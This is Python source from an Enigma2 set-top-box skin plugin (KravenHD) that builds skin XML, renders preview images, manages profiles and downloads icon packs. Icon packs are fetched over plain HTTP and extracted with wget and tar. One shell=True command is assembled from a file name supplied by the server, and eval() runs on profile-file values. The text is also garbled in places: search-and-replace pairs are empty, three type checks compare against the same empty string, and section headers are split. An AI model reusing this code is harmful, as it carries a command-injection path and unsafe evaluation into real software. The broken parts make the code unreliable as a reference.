'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"180,45\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Plugins\n\t\tself.appendSkinFile(self.data + \"plugins.xml\")\n\n\t\t### MSNWeather\n\t\tif fileExists(\"/usr/lib/enigma2/python/Components/Converter/MSNWeather.pyo\"):\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\" or config.plugins.KravenHD.PopupStyle.value in (\"popup-grad\", \"popup-grad-trans\"):\n\t\t\t\tself.changeColor(\"msnbg_gr\", \"msnbg\", self.skincolorbackgroundcolor, None)\n\t\t\telse:\n\t\t\t\tself.changeColor(\"msnbg\", \"msnbg\", self.skincolorbackgroundcolor, None)\n\t\t\tself.appendSkinFile(self.data + \"weatherplugin.xml\")\n\t\t\tif self.InternetAvailable and not fileExists(\"/usr/share/enigma2/KravenHD/msn_weather_icons/1.png\"):\n\t\t\t\tconsole3 = eConsoleAppContainer()\n\t\t\t\tconsole3.execute(\"wget -q http://picons.mynonpublic.com/msn-icon.tar.gz -O /tmp/msn-icon.tar.gz; tar xf /tmp/msn-icon.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\telse:\n\t\t\tself.appendSkinFile(self.data + \"weatherplugin2.xml\")\n\n\t\t### NetatmoBar\n\t\tif self.InternetAvailable:\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/Netatmo/plugin.py\"):\n\t\t\t\t\tif self.actWeatherstyle == \"netatmobar\":\n\t\t\t\t\t\tself.appendSkinFile(self.data + \"netatmobar.xml\")\n\n\t\t### EMC (MovieList) Font-Colors\n\t\tself.skinSearchAndReplace.append(['UnwatchedColor=\"unwatched\"', 'UnwatchedColor=\"#00' + config.plugins.KravenHD.UnwatchedColor.value + '\"'])\n\t\tself.skinSearchAndReplace.append(['WatchingColor=\"watching\"', 'WatchingColor=\"#00' + config.plugins.KravenHD.WatchingColor.value + '\"'])\n\t\tself.skinSearchAndReplace.append(['FinishedColor=\"finished\"', 'FinishedColor=\"#00' + config.plugins.KravenHD.FinishedColor.value + '\"'])\n\n\t\t### EMC\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.EMCStyle.value + \".xml\")\n\n\t\t### NumberZapExt\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.NumberZapExt.value + \".xml\")\n\t\tif not config.plugins.KravenHD.NumberZapExt.value == \"none\":\n\t\t\tconfig.usage.numberzap_show_picon.value = True\n\t\t\tconfig.usage.numberzap_show_picon.save()\n\t\t\tconfig.usage.numberzap_show_servicename.value = True\n\t\t\tconfig.usage.numberzap_show_servicename.save()\n\n\t\t### FileCommander\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.FileCommander.value + \".xml\")\n\n\t\t### EPGSelection\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.EPGSelection.value + \".xml\")\n\n\t\t### CoolTVGuide\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.CoolTVGuide.value + \".xml\")\n\n\t\t### GraphicalEPG (Event-Description) 
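Font-Size\n\t\t# GMEDescriptionSize \"big\" presumably swaps in a larger description font\n\t\t# via the two replacements below\n\t\t### GraphicalEPG 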
Font-Size\n\t\tif config.plugins.KravenHD.GMEDescriptionSize.value == \"big\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### GraphicalEPG\n\t\tif config.plugins.KravenHD.GraphicalEPG.value == \"text\":\n\t\t\tconfig.epgselection.graph_type_mode.value = False\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = False\n\t\t\tconfig.epgselection.graph_pig.save()\n\t\telif config.plugins.KravenHD.GraphicalEPG.value == \"text-minitv\":\n\t\t\tconfig.epgselection.graph_type_mode.value = False\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = True\n\t\t\tconfig.epgselection.graph_pig.save()\n\t\telif config.plugins.KravenHD.GraphicalEPG.value == \"graphical\":\n\t\t\tconfig.epgselection.graph_type_mode.value = \"graphics\"\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = False\n\t\t\tconfig.epgselection.graph_pig.save()\n\t\telif config.plugins.KravenHD.GraphicalEPG.value == \"graphical-minitv\":\n\t\t\tconfig.epgselection.graph_type_mode.value = \"graphics\"\n\t\t\tconfig.epgselection.graph_type_mode.save()\n\t\t\tconfig.epgselection.graph_pig.value = True\n\t\t\tconfig.epgselection.graph_pig.save()\n\n\t\t### MovieSelection\n\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.MovieSelection.value + \".xml\")\n\n\t\t### bsWindow\n\t\tself.makebsWindowpng()\n\n\t\t### VirtualKeyBoard\n\t\tif config.plugins.KravenHD.PopupStyle.value == \"popup-grad-trans\":\n\t\t\tself.changeColor(\"virtualkeyboard_gr_tr\",\"virtualkeyboard\",self.skincolorbackgroundcolor,None)\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-grad\":\n\t\t\tself.changeColor(\"virtualkeyboard_gr\",\"virtualkeyboard\",self.skincolorbackgroundcolor,None)\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box-trans\":\n\t\t\tself.changeColor(\"virtualkeyboard_bx_tr\",\"virtualkeyboard\",self.skincolorbackgroundcolor,config.plugins.KravenHD.Border.value)\n\t\telif config.plugins.KravenHD.PopupStyle.value == \"popup-box\":\n\t\t\tself.changeColor(\"virtualkeyboard_bx\",\"virtualkeyboard\",self.skincolorbackgroundcolor,config.plugins.KravenHD.Border.value)\n\n\t\t### SerienRecorder\n\t\tif config.plugins.KravenHD.SerienRecorder.value == \"serienrecorder\":\n\t\t\tself.appendSkinFile(self.data + config.plugins.KravenHD.SerienRecorder.value + \".xml\")\n\t\t\tself.changeColor(\"popup_bg\", \"popup_bg\", self.skincolorbackgroundcolor, config.plugins.KravenHD.Border.value)\n\n\t\t### MediaPortal\n\t\tconsole4 = eConsoleAppContainer()\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\"):\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\t\tconsole4.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/MediaPortal.tar.gz -C /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/\")\n\t\t\t\telse:\n\t\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD/MP_skin.xml\"):\n\t\t\t\t\t\tconsole4.execute(\"rm -rf /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD\")\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\t\tconsole4.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/MediaPortal.tar.gz -C 
/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/\")\n\t\t\t\telse:\n\t\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD/MP_skin.xml\"):\n\t\t\t\t\t\tconsole4.execute(\"rm -rf /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD\")\n\n\t\t### skin-user\n\t\ttry:\n\t\t\tself.appendSkinFile(self.data + \"skin-user.xml\")\n\t\texcept:\n\t\t\tpass\n\n\t\t### skin-end\n\t\tself.appendSkinFile(self.data + \"skin-end.xml\")\n\n\t\txFile = open(self.dateiTMP, \"w\")\n\t\tfor xx in self.skin_lines:\n\t\t\txFile.writelines(xx)\n\t\txFile.close()\n\n\t\tmove(self.dateiTMP, self.datei)\n\n\t\t### Menu icons download - we do it here to give it some time\n\t\tif self.InternetAvailable:\n\t\t\tif config.plugins.KravenHD.Logo.value in (\"metrix-icons\", \"minitv-metrix-icons\"):\n\t\t\t\tself.installIcons(config.plugins.KravenHD.MenuIcons.value)\n\n\t\t# make global background graphics\n\t\tif config.plugins.KravenHD.BackgroundColor.value == \"gradient\":\n\t\t\tself.makeBGGradientpng()\n\t\telif config.plugins.KravenHD.BackgroundColor.value == \"texture\":\n\t\t\tself.makeBGTexturepng()\n\n\t\t# make infobar background graphics\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tif config.plugins.KravenHD.InfobarGradientColor.value == \"texture\":\n\t\t\t\tself.makeIBGradTexturepng()\n\t\t\telse: # single color\n\t\t\t\tself.makeIBGradColorpng()\n\t\telif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.makeIBGradientpng()\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.makeIBTexturepng()\n\n\t\t# make selection pixmaps\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"pixmap\":\n\t\t\tself.makeSELGradientpng()\n\n\t\t# copy bsWindow to MediaPortal-folder\n\t\tconsole5 = eConsoleAppContainer()\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD/MP_skin.xml\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\" and config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tconsole5.execute(\"cp /usr/share/enigma2/KravenHD/graphics/bs_* /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_720/KravenHD/images/\")\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD/MP_skin.xml\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\" and config.plugins.KravenHD.SkinResolution.value == \"fhd\":\n\t\t\tconsole5.execute(\"cp /usr/share/enigma2/KravenHD/graphics/bs_* /usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/skins_1080/KravenHD/images/\")\n\n\t\t# Thats it\n\t\tself.restart()\n\n\tdef restart(self):\n\t\tconfigfile.save()\n\t\trestartbox = self.session.openWithCallback(self.restartGUI, MessageBox, _(\"GUI needs a restart to apply a new skin.\\nDo you want to Restart the GUI now?\"), MessageBox.TYPE_YESNO)\n\t\trestartbox.setTitle(_(\"Restart GUI\"))\n\n\tdef appendSkinFile(self, appendFileName, skinPartSearchAndReplace=None):\n\t\t\"\"\"\n\t\tadd skin file to main skin content\n\n\t\tappendFileName:\n\t\t xml skin-part to add\n\n\t\tskinPartSearchAndReplace:\n\t\t (optional) a list of search and replace arrays. 
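For example,\n\t\t [['scrollbarMode=\"showNever\"', 'scrollbarMode=\"showOnDemand\"']] would\n\t\t re-enable every hidden scrollbar in the appended file. Each entry's 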
first element is the search string, the second the replacement.\n\t\t\"\"\"\n\t\tskFile = open(appendFileName, \"r\")\n\t\tfile_lines = skFile.readlines()\n\t\tskFile.close()\n\n\t\ttmpSearchAndReplace = []\n\n\t\tif skinPartSearchAndReplace is not None:\n\t\t\ttmpSearchAndReplace = self.skinSearchAndReplace + skinPartSearchAndReplace\n\t\telse:\n\t\t\ttmpSearchAndReplace = self.skinSearchAndReplace\n\n\t\tfor skinLine in file_lines:\n\t\t\tfor item in tmpSearchAndReplace:\n\t\t\t\tskinLine = skinLine.replace(item[0], item[1])\n\t\t\tself.skin_lines.append(skinLine)\n\n\tdef restartGUI(self, answer):\n\t\tif answer is True:\n\t\t\tconfig.skin.primary_skin.setValue(\"KravenHD/skin.xml\")\n\t\t\tconfig.skin.save()\n\t\t\tconfigfile.save()\n\t\t\tself.session.open(TryQuitMainloop, 3)\n\t\telse:\n\t\t\tself.close()\n\n\tdef exit(self):\n\t\taskExit = self.session.openWithCallback(self.doExit, MessageBox, _(\"Do you really want to exit without saving?\"), MessageBox.TYPE_YESNO)\n\t\taskExit.setTitle(_(\"Exit\"))\n\n\tdef doExit(self, answer):\n\t\tif answer is True:\n\t\t\tfor x in self[\"config\"].list:\n\t\t\t\tif len(x) > 1:\n\t\t\t\t\tx[1].cancel()\n\t\t\tself.close()\n\t\telse:\n\t\t\tself.mylist()\n\n\tdef getBoxName(self):\n\t\tif fileExists(\"/proc/stb/info/vumodel\"):\n\t\t\tf = open('/proc/stb/info/vumodel', 'r')\n\t\t\tboxname = f.readline().strip()\n\t\t\tf.close()\n\t\t\treturn boxname\n\t\telse:\n\t\t\ttry:\n\t\t\t\tfrom boxbranding import getMachineName\n\t\t\t\treturn getMachineName()\n\t\t\texcept ImportError:\n\t\t\t\treturn \"unknown\"\n\n\tdef getTuners(self):\n\t\tfrom Components.Sources.TunerInfo import TunerInfo\n\t\ttinfo = TunerInfo()\n\t\ttuners = tinfo.getTunerAmount()\n\t\tif tuners == 1:\n\t\t\treturn \"1-tuner\"\n\t\telif tuners == 2:\n\t\t\treturn \"2-tuner\"\n\t\telif (3 <= tuners <= 4):\n\t\t\treturn \"4-tuner\"\n\t\telif (5 <= tuners):\n\t\t\treturn \"8-tuner\"\n\t\telse:\n\t\t\treturn \"1-tuner\"\n\n\tdef getInternetAvailable(self):\n\t\tfrom . import ping\n\t\tr = ping.doOne(\"8.8.8.8\", 1.5)\n\t\treturn r is not None and r <= 1.5\n\n\tdef getUserMenuIconsAvailable(self):\n\t\tuserpath=\"/usr/share/enigma2/Kraven-user-icons\"\n\t\treturn path.exists(userpath) and any(File.endswith(\".png\") for File in listdir(userpath))\n\n\tdef reset(self):\n\t\taskReset = self.session.openWithCallback(self.doReset, MessageBox, _(\"Do you really want to reset all values to the selected default profile?\"), MessageBox.TYPE_YESNO)\n\t\taskReset.setTitle(_(\"Reset profile\"))\n\n\tdef doReset(self, answer):\n\t\tif answer is True:\n\t\t\tif config.plugins.KravenHD.defaultProfile.value == \"default\":\n\t\t\t\tfor name in config.plugins.KravenHD.dict():\n\t\t\t\t\tif name not in (\"customProfile\", \"DebugNames\"):\n\t\t\t\t\t\titem = getattr(config.plugins.KravenHD, name)\n\t\t\t\t\t\titem.value = item.default\n\t\t\telse:\n\t\t\t\tself.loadProfile(loadDefault=True)\n\t\tself.mylist()\n\n\tdef showColor(self, actcolor):\n\t\tc = self[\"Canvas\"]\n\t\tc.fill(0, 0, 368, 207, actcolor)\n\t\tc.flush()\n\n\tdef showGradient(self, color1, color2):\n\t\twidth=368\n\t\theight=207\n\t\tcolor1=color1[-6:]\n\t\tr1=int(color1[0:2], 16)\n\t\tg1=int(color1[2:4], 16)\n\t\tb1=int(color1[4:6], 16)\n\t\tcolor2=color2[-6:]\n\t\tr2=int(color2[0:2], 16)\n\t\tg2=int(color2[2:4], 16)\n\t\tb2=int(color2[4:6], 16)\n\t\tc = self[\"Canvas\"]\n\t\tif color1!=color2:\n\t\t\t# simple vertical gradient: interpolate per scanline between the two colors\n\t\t\tfor pos in range(0, height):\n\t\t\t\tp=pos/float(height)\n\t\t\t\tr=r2*p+r1*(1-p)\n\t\t\t\tg=g2*p+g1*(1-p)\n\t\t\t\tb=b2*p+b1*(1-p)\n\t\t\t\tc.fill(0, pos, width, 1, self.RGB(int(r), int(g), int(b)))\n\t\telse:\n\t\t\tc.fill(0, 0, width, height, self.RGB(int(r1), int(g1), int(b1)))\n\t\tc.flush()\n\n\tdef showText(self, fontsize, text):\n\t\tfrom enigma import gFont, RT_HALIGN_CENTER, RT_VALIGN_CENTER\n\t\tc = self[\"Canvas\"]\n\t\tc.fill(0, 0, 368, 207, self.RGB(0, 0, 0))\n\t\tc.writeText(0, 0, 368, 207, self.RGB(255, 255, 255), self.RGB(0, 0, 0), gFont(\"Regular\", fontsize), text, RT_HALIGN_CENTER+RT_VALIGN_CENTER)\n\t\tc.flush()\n\n\tdef loadProfile(self,loadDefault=False):\n\t\tif loadDefault:\n\t\t\tprofile=config.plugins.KravenHD.defaultProfile.value\n\t\t\tfname=self.profiles+\"kravenhd_default_\"+profile\n\t\telse:\n\t\t\tprofile=config.plugins.KravenHD.customProfile.value\n\t\t\tfname=self.profiles+\"kravenhd_profile_\"+profile\n\t\tif profile and fileExists(fname):\n\t\t\tprint(\"KravenPlugin: Load profile \"+fname)\n\n\t\t\tpFile=open(fname, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\t# each profile line is \"name|value|type\" (see saveProfile)\n\t\t\t\ttry:\n\t\t\t\t\tline=line.split(\"|\")\n\t\t\t\t\tname=line[0]\n\t\t\t\t\tvalue=line[1]\n\t\t\t\t\ttype=line[2].strip('\\n')\n\t\t\t\t\tif not (name in (\"customProfile\", \"DebugNames\", \"msn_language\", \"msn_searchby\", \"msn_list\", \"msn_cityname\", \"msn_code\") or (loadDefault and name == \"defaultProfile\")):\n\t\t\t\t\t\t# fix for changed value \"gradient\"/\"grad\"\n\t\t\t\t\t\tif name==\"IBStyle\" and value==\"gradient\":\n\t\t\t\t\t\t\tvalue=\"grad\"\n\t\t\t\t\t\t# fix for changed name \"InfobarColor\"/\"InfobarGradientColor\"\n\t\t\t\t\t\tif name==\"InfobarColor\":\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.InfobarGradientColor.value=value\n\t\t\t\t\t\tif type == \"\":\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=int(value)\n\t\t\t\t\t\telif type == \"\":\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=hex(value)\n\t\t\t\t\t\telif type == 
\"\":\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=eval(value)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tgetattr(config.plugins.KravenHD, name).value=str(value)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tpFile.close()\n\n\t\telif not loadDefault:\n\t\t\tprint (\"KravenPlugin: Create profile \"+fname)\n\t\t\tself.saveProfile(msg=False)\n\n\tdef saveProfile(self,msg=True):\n\t\tprofile=config.plugins.KravenHD.customProfile.value\n\t\tif profile:\n\t\t\ttry:\n\t\t\t\tfname=self.profiles+\"kravenhd_profile_\"+profile\n\t\t\t\tprint (\"KravenPlugin: Save profile \"+fname)\n\t\t\t\tpFile=open(fname, \"w\")\n\t\t\t\tfor name in config.plugins.KravenHD.dict():\n\t\t\t\t\tif not name in (\"customProfile\", \"DebugNames\", \"msn_language\", \"msn_searchby\", \"msn_list\", \"msn_cityname\", \"msn_code\"):\n\t\t\t\t\t\tvalue=getattr(config.plugins.KravenHD, name).value\n\t\t\t\t\t\tpFile.writelines(name+\"|\"+str(value)+\"|\"+str(type(value))+\"\\n\")\n\t\t\t\tpFile.close()\n\t\t\t\tif msg:\n\t\t\t\t\tself.session.open(MessageBox, _(\"Profile \")+str(profile)+_(\" saved successfully.\"), MessageBox.TYPE_INFO, timeout=5)\n\t\t\texcept:\n\t\t\t\tself.session.open(MessageBox, _(\"Profile \")+str(profile)+_(\" could not be saved!\"), MessageBox.TYPE_INFO, timeout=15)\n\n\tdef installIcons(self, author):\n\n\t\tif self.InternetAvailable == False: \n\t\t\treturn\n\n\t\tpathname=\"http://picons.mynonpublic.com/\"\n\t\tinstname=\"/usr/share/enigma2/Kraven-menu-icons/iconpackname\"\n\t\tversname=\"Kraven-Menu-Icons-by-\"+author+\".packname\"\n\t\t\n\t\t# Read iconpack version on box\n\t\tpackinstalled = \"not installed\"\n\t\tif fileExists(instname):\n\t\t\tpFile=open(instname, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\tpackinstalled=line.strip('\\n')\n\t\t\tpFile.close()\n\t\tprint (\"KravenPlugin: Iconpack on box is \"+packinstalled)\n\t\t\n\t\t# Read iconpack version on server\n\t\tpackonserver = \"unknown\"\n\t\tfullversname=pathname+versname\n\t\tsub=subprocess.Popen(\"wget -q \"+fullversname+\" -O /tmp/\"+versname, shell=True)\n\t\tsub.wait()\n\t\tif fileExists(\"/tmp/\"+versname):\n\t\t\tpFile=open(\"/tmp/\"+versname, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\tpackonserver=line.strip('\\n')\n\t\t\tpFile.close()\n\t\t\tpopen(\"rm /tmp/\"+versname)\n\t\t\tprint (\"KravenPlugin: Iconpack on server is \"+packonserver)\n\n\t\t\t# Download an install icon pack, if needed\n\t\t\tif packinstalled != packonserver:\n\t\t\t\tpackname=packonserver\n\t\t\t\tfullpackname=pathname+packname\n\t\t\t\tsub=subprocess.Popen(\"rm -rf /usr/share/enigma2/Kraven-menu-icons/*.*; rm -rf /usr/share/enigma2/Kraven-menu-icons; wget -q \"+fullpackname+\" -O /tmp/\"+packname+\"; tar xf /tmp/\"+packname+\" -C /usr/share/enigma2/\", shell=True)\n\t\t\t\tsub.wait()\n\t\t\t\tpopen(\"rm /tmp/\"+packname)\n\t\t\t\tprint (\"KravenPlugin: Installed iconpack \"+fullpackname)\n\t\t\telse:\n\t\t\t\tprint (\"KravenPlugin: No need to install other iconpack\")\n\n\tdef makeTexturePreview(self, style):\n\t\twidth = 368\n\t\theight = 207\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\t\toutpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif 
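The saveProfile/loadProfile pair above persists each setting as one pipe-separated name|value|type line and re-casts the value from the stored type tag on load. A minimal standalone sketch of that round-trip, independent of the Enigma2 config object (save_profile, load_profile and the settings dict are hypothetical names):

def save_profile(settings, fname):
    # one "name|value|type" line per entry, mirroring saveProfile() above
    with open(fname, "w") as f:
        for name, value in settings.items():
            f.write(name + "|" + str(value) + "|" + str(type(value)) + "\n")

def load_profile(fname):
    # re-cast each value from its stored type tag, as loadProfile() above does
    settings = {}
    with open(fname) as f:
        for line in f:
            name, value, typetag = line.rstrip("\n").split("|")
            if typetag == str(int):
                settings[name] = int(value)
            elif typetag == str(bool):
                settings[name] = (value == "True")
            else:
                settings[name] = value
    return settings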
fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timage = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timage.paste(bg, (i, j))\n\t\timage.save(outpath + \"preview.jpg\")\n\t\t\n\tdef makeAlternatePreview(self, style, color):\n\t\twidth = 368\n\t\theight = 207\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\t\toutpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timage = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timage.paste(bg, (i, j))\n\t\tcolor=color[-6:]\n\t\tr=int(color[0:2], 16)\n\t\tg=int(color[2:4], 16)\n\t\tb=int(color[4:6], 16)\n\t\timage.paste((int(r), int(g), int(b), 255), (0, int(height/2), width, height))\n\t\timage.save(outpath + \"preview.jpg\")\n\t\t\n\tdef makePreview(self):\n\t\twidth = 368\n\t\theight = 208\n\t\tlineheight = 3\n\t\tboxbarheight = 40\n\t\tgradbarheight = 80\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\t\t\t\n\t\t# background\n\t\tif config.plugins.KravenHD.BackgroundColor.value == \"texture\":\n\t\t\tstyle = config.plugins.KravenHD.BackgroundTexture.value\n\t\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\t\telif fileExists(inpath + style + \".png\"):\n\t\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\t\tbg_w, bg_h = bg.size\n\t\t\timg = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\t\tfor i in range(0, width, bg_w):\n\t\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\t\timg.paste(bg, (i, j))\n\t\telif config.plugins.KravenHD.BackgroundColor.value == \"gradient\":\n\t\t\tc1=config.plugins.KravenHD.BackgroundGradientColorPrimary.value\n\t\t\tc2=config.plugins.KravenHD.BackgroundGradientColorSecondary.value\n\t\t\tc1=c1[-6:]\n\t\t\tr1=int(c1[0:2], 16)\n\t\t\tg1=int(c1[2:4], 16)\n\t\t\tb1=int(c1[4:6], 16)\n\t\t\tc2=c2[-6:]\n\t\t\tr2=int(c2[0:2], 16)\n\t\t\tg2=int(c2[2:4], 16)\n\t\t\tb2=int(c2[4:6], 16)\n\t\t\tif c1!=c2:\n\t\t\t\timg = Image.new(\"RGBA\", (1, height))\n\t\t\t\tfor pos in range(0, height):\n\t\t\t\t\tp=pos/float(height)\n\t\t\t\t\tr=r2*p+r1*(1-p)\n\t\t\t\t\tg=g2*p+g1*(1-p)\n\t\t\t\t\tb=b2*p+b1*(1-p)\n\t\t\t\t\timg.putpixel((0, pos), (int(r), int(g), int(b), 255))\n\t\t\t\timg = img.resize((width, height))\n\t\t\telse:\n\t\t\t\timg = Image.new(\"RGBA\", (width, height), (int(r1), int(g1), int(b1), 255))\n\t\telse:\n\t\t\tc=self.skincolorbackgroundcolor\n\t\t\tc=c[-6:]\n\t\t\tr=int(c[0:2], 16)\n\t\t\tg=int(c[2:4], 16)\n\t\t\tb=int(c[4:6], 16)\n\t\t\timg = Image.new(\"RGBA\", (width, height), (int(r), int(g), int(b), 255))\n\t\t\n\t\t# 
infobars\n\t\tif config.plugins.KravenHD.IBStyle.value==\"grad\":\n\t\t\tif config.plugins.KravenHD.InfobarGradientColor.value == \"texture\":\n\t\t\t\tstyle = config.plugins.KravenHD.InfobarTexture.value\n\t\t\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\t\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\t\t\telif fileExists(inpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\t\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\t\t\tbg_w, bg_h = bg.size\n\t\t\t\tib = Image.new(\"RGBA\", (width, gradbarheight), (0, 0, 0, 0))\n\t\t\t\tfor i in range(0, width, bg_w):\n\t\t\t\t\tfor j in range(0, gradbarheight, bg_h):\n\t\t\t\t\t\tib.paste(bg, (i, j))\n\t\t\telse:\n\t\t\t\tc=self.skincolorinfobarcolor\n\t\t\t\tc=c[-6:]\n\t\t\t\tr=int(c[0:2], 16)\n\t\t\t\tg=int(c[2:4], 16)\n\t\t\t\tb=int(c[4:6], 16)\n\t\t\t\tib = Image.new(\"RGBA\", (width, gradbarheight), (int(r), int(g), int(b), 255))\n\t\t\ttrans=(255-int(config.plugins.KravenHD.InfobarColorTrans.value, 16))/255.0\n\t\t\tgr = Image.new(\"L\", (1, gradbarheight), int(255*trans))\n\t\t\tfor pos in range(0, gradbarheight):\n\t\t\t\tgr.putpixel((0, pos), int(self.dexpGradient(gradbarheight, 2.0, pos)*trans))\n\t\t\tgr=gr.resize(ib.size)\n\t\t\timg.paste(ib, (0, height-gradbarheight), gr)\n\t\t\tib=ib.transpose(Image.ROTATE_180)\n\t\t\tgr=gr.transpose(Image.ROTATE_180)\n\t\t\timg.paste(ib, (0, 0), gr)\n\t\telse: # config.plugins.KravenHD.IBStyle.value==\"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tstyle = 